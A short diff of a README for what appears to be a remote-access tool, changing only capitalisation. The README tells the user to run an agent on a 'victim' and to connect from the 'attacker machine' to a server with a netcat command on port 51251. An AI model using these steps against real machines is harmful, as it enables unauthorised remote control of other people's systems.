axano/aldebaran/README.md

 python3 darma/main.py
 ```
 ## Victim
-run agent on victim
+Run agent on victim

 ## Attacker machine
-connect to server with netcat on port 51251 with attackers machine
+Connect to server with netcat on port 51251 with attackers machine

 ```
 nc ip_of_server 51251